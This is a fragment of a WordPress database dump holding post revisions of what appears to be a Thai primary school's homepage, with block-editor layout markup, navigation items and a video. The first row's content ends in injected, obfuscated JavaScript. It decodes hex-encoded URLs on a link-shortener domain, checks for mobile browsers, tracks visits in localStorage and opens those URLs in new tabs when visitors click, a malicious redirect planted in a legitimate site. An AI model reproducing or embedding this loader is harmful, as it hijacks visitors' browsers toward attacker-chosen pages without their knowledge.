_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 11:56:30','2024-08-27 04:56:30','',19,'http://watprato.ssk.in.th/?p=224',0,'revision','',0),
(225,2,'2024-08-27 11:59:58','2024-08-27 04:59:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 